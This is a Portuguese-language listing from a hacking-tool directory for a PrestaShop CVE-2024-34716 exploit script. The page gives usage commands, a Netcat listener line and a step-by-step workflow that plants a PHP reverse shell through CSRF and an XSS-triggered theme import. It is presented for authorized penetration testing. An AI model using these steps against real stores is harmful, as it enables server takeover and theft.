Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Prestashop-CVE-2024-34716 — Script automatizado de exploração CSRF para PrestaShop que carrega e executa um reverse shell PHP por meio de um payload ZIP manipulado, exigindo um listener Netcat para captura de conexão. | Kitploit
Ferramentas/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Geração de PayloadsExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

Script automatizado de exploração CSRF para PrestaShop que carrega e executa um reverse shell PHP por meio de um payload ZIP manipulado, exigindo um listener Netcat para captura de conexão.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11há 1 anoAinda não revisado

Script de Exploração para Ataque CSRF e Reverse Shell

Este script automatiza um exploit de CSRF (Cross-Site Request Forgery) para enviar um reverse shell PHP para o servidor web do alvo e executá-lo. O reverse shell é entregue como um arquivo ZIP através de um payload CSRF elaborado, que é acionado quando um usuário privilegiado interage com um endpoint específico. O script requer uma instância do Netcat em modo de escuta para capturar a conexão do reverse shell.

Parece estar quebrado por enquanto, atualizarei depois

Requisitos

  • Netcat: Certifique-se de que o Netcat está instalado e pode escutar em uma porta específica (padrão: 9001).
  • Python 3: Usado para servir arquivos via HTTP.
  • Curl & JQ: Usados para buscar e lidar com requisições HTTP e análise de JSON.

Uso

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Argumentos

  • target_url: URL base do alvo (ex.: https://example.com).
  • admin_endpoint: Caminho para o endpoint de importação de temas do admin.
  • admin_email: Endereço de e-mail de um administrador (para falsificar no payload).
  • attacker_ip: Endereço IP onde o listener do reverse shell receberá a conexão.

Exemplo

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

Fluxo de Trabalho do Exploit

  1. Criação do Reverse Shell: Gera um reverse shell PHP usando revshells.com com o attacker_ip e porta 9001 fornecidos.
  2. Empacotamento ZIP: O script do reverse shell (love.php) é comprimido em Love-exploit.zip.
  3. Busca do Token CSRF: Obtém o token CSRF do alvo para autorizar a requisição de importação de temas.
  4. Construção do Payload HTML: Constrói um payload HTML (csrf_payload.html) contendo um script JavaScript para enviar automaticamente uma requisição maliciosa ao painel admin do alvo, importando o reverse shell.
  5. Configuração do Servidor HTTP: Um servidor HTTP temporário na porta 8000 serve o Love-exploit.zip para o alvo importar.
  6. Envio do XSS e Acionamento do CSRF: O payload CSRF é enviado para a página de contato do alvo. Quando acessado, ele aciona o ataque CSRF.
  7. Listener do Reverse Shell: O atacante monitora conexões recebidas da vítima usando Netcat.

Passos de Execução

  1. Inicie um listener Netcat na sua máquina:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Execute o script:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. Aguarde o alvo executar o payload CSRF e receba a conexão do reverse shell.

Saída

O script exibe as seguintes informações durante a execução:

  • Status da obtenção do token CSRF.
  • Status da criação e empacotamento do reverse shell.
  • Status da entrega do payload e do servidor HTTP.

Notas Importantes

  • Permissões: Este script requer permissão para ser executado no servidor alvo. O uso não autorizado é ilegal e punível por lei.
  • Ambiente de Teste: Utilize apenas em um ambiente controlado e autorizado, como um laboratório de cibersegurança.
  • Conflitos de Porta: Certifique-se de que as portas 8000 (servidor HTTP) e 9001 (listener Netcat) estão livres antes de executar o script.

Exemplo de Saída

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

Este documento é destinado ao uso por testadores de penetração e pesquisadores de cibersegurança em ambientes controlados. O uso indevido desta ferramenta para fins não autorizados é estritamente proibido.


Aviso Legal

Este script é apenas para fins educacionais e avaliações legais de cibersegurança. O uso não autorizado contra um sistema sem permissão é ilegal e contrário às diretrizes éticas.

Baixar ferramenta